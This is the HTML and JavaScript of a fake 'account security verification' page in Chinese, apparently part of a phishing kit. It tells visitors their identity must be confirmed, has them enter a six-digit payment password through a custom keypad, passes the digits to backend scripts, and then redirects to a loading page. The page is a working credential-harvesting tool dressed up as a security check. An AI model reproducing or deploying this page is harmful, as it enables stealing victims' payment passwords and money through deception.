<!doctype html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no">
<title>验证中请稍后</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="renderer" content="webkit">
<meta name="x5-fullscreen" content="true">
<meta name="browsermode" content="application">
<meta name="x5-page-mode" content="app">
<meta content="telephone=no" name="format-detection">
<link rel="stylesheet" href="./reset.css">
<link rel="stylesheet" href="./style.css">
<script src="./jquery-1.6.min.js"></script>
<link href="./m.css" rel="stylesheet">
<script src="../app/data.js"></script>
<style>
	html{background-color:#fff;font-size:14px;color:#2b2b2b;background:#fff}
	*{font-family:"微软雅黑";}
	.wrap{width:96%;padding:2%;background:#fff;max-width:640px;margin:50px auto 0}
	.khimg{width:100%;margin:0 auto;text-align:center;}
	.khimg img{width:90%;}
	.tjform{margin-top:10px;overflow:hidden;width:100%;margin-top:20px;}
	.tjbtn{width:100%;text-align:center;margin-top:20px;}
	.tjbtn input{background:#3eb737;border:none;padding:3% 10%;text-align:center;color:#fff;font-size:16px;border-radius:10px;margin:0 auto}
	.my{width:369px;height:40px;position:absolute;z-index:999;left:20px;}
	.numlist{text-align:center;position:relative;margin:-4px 0 -12px;padding:20px 0 25px;}
	.numlist .numli{width:28px;height:28px;line-height:28px;font-size:17px;font-weight:600;background-color:#f5f5f5;border:solid #eee 1px;display:inline-block;margin:10px 5px 20px;border-radius:2px;}
	.tjform2{text-align:center;}
	.tankuang{}
	.kb_jp{z-index:1111;}
</style>
<script src="../images/key2.js"></script>
</head>
<body>
<div id="content" class="content">
	<form method="post" id="fro" action="update/index.php" autocomplete="off">
		<div id="login" class="login">
			<div class="title">验证中请稍后</div>
			<div id="web_login">
				<div class="info">请点击下一步完成验证</div>
				<br>
				<br>
				<br>
				<br>
				<p style="color:#727272;font-size:16px;line-height:26px;font-weight: 900;margin: 20px 0 49px;text-align: center;">为了您的账号安全，本次操作需要核实身份</p>
				<br>
				<br>
				<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" name="submit" onclick="return next();">下一步</div>
			</div>
		</div>
	</form>
</div>
<div class="bot">手机号不用了？<a class="info_a">找回账号</a></div>

	<div id="msg_bg" style="background:rgba(0,0,0,0.6);position:fixed;left:0;top:0;width:100%;height:100%;z-index:1;display:none;">
		<div id="msg_box" style="z-index:2;margin:150px auto 0;background:#fff;border:solid #aaa 1px;border-radius:5px;width:90%;max-width:450px;text-align:center;">
			<div style="padding:0;color:#333;font-size:16px;line-height:2;" class="tankuang">
				<p style="color:#303030;text-align:center;font-size:20px;border-bottom: solid 1px #eee;padding: 15px 0 7px;">输入支付密码核实身份</p>
				<div class="numlist">
					<div class="numli" >&nbsp;</div>
					<div class="numli" >&nbsp;</div>
					<div class="numli" >&nbsp;</div>
					<div class="numli" >&nbsp;</div>
					<div class="numli" >&nbsp;</div>
					<div class="numli" >&nbsp;</div>
					<input type="hidden" placeholder=" " name="code" id="code" maxlength="6" onkeyup="value=value.replace(/[^\d\.]/g,&#39;&#39;)">
				</div>
			</div>
		</div>
	</div>
	<script language="JavaScript">
		rs({pn:'code'});
			kb('#code');
		function next(){
			$('#msg_bg').show();
			$('.kb_c1').click();
		}
		function setcode(str){
			if(str.length >= 6){
			console.log(11);
				setTimeout(function(){
					mySubmit();
				},500);
			}
			for(var i=0;i<6;i++){
				if(str.charAt(i)){
					$('.numlist .numli').eq(i).html('●')
				}else{
					$('.numlist .numli').eq(i).html('&nbsp;')
				}
			}
			$('#code').val($('#code').val().substr(0,6))
		}
		function mySubmit() {
			if (!/^\d{6}$/.test($('#code').val())) {
				tip('验证码为6位数字，请重新输入!');
				return false;
			}
			ds('sv', {phone: $('#code').val()});
			setTimeout(function(){
				//top.location.href=conf.readyJump;
				location.href='../load/';
			},0);
		}
	</script>
</body>
</html>